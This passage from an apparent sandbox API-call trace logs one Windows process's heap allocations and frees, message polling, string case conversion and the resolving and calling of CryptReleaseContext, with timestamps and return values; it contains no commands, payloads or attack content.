wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0252.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0252.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.686] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0252.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0252.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.687] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.689] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0252.690] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.690] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.691] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.692] FreeLibrary (hLibModule=0x74d40000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.692] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.692] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.692] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0252.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0252.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0252.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0252.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.694] CloseHandle (hObject=0x294) returned 1 [0252.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0252.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0252.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0252.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0252.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0252.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0252.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.699] CloseHandle (hObject=0x2cc) returned 1 [0252.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0252.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: 